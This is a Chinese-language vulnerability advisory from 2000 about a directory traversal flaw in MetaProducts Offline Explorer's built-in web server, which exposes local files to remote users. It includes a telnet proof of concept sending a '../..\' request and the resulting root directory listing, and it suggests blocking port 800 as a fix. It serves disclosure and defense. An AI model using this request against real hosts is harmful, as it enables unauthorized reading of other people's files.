MetaProducts Offline Explorer泄漏本地文件漏洞
发布日期:2000-05-21
更新日期:2000-05-22
受影响系统:MetaProducts Offline Explorer 1.3.250 / 1.3.241
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
描述:
MetaProducts的Offline Explorer是一个流行的离线浏览软件,缺省它会在800端口提供一个
web服务,远程用户可以浏览已经下载的页面,由于没有正确检查用户输入的请求,远程用户
也可能获得对主机系统文件及目录的读权限。
<* 来源: Wyzewun (wyze1@sexdrugsunix.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ telnet victim.ip 80
GET ../..\ HTTP/1.1
HTTP/1.0 200 OK
Server: Web Downloader 4.1 (Win32)
Content-Type: text/html
Content-Length: 5048
<html><head><title>../..\</title></head><body><h3>Directory of ../..\</h3><p>
<hr><table><tr><td></td><td><tt>1696</td><td><tt><a href="MSDOS.SYS">MSDOS.SYS
</a></td></tr><tr><td></td><td><tt>1033</td><td><tt><a href="AUTOEXEC.BAT">
AUTOEXEC.BAT</a></td></tr><tr><td></td><td><tt>222390</td><td><tt><a href="IO.
SYS">IO.SYS</a></td></tr><tr><td></td><td><tt>29636</td><td><tt><a href="BOOTL
OG.TXT">BOOTLOG.TXT</a></td></tr><tr><td><img src="/Folder.gif" valign=middle>
</td><td><tt>0</td><td><tt><a href="WINDOWS">WINDOWS</a></td></tr><tr><td><img
src="/Folder.gif" valign=middle></td><td><tt>0</td><td><tt><a href="My
Documents">My Documents</a></td></tr><tr><td><img src="/Folder.gif" valign=
建议:
临时解决方法:
安装个人防火墙软件,不允许外部主机连接本地的800端口
浏览次数:6408
严重程度:0(网友投票)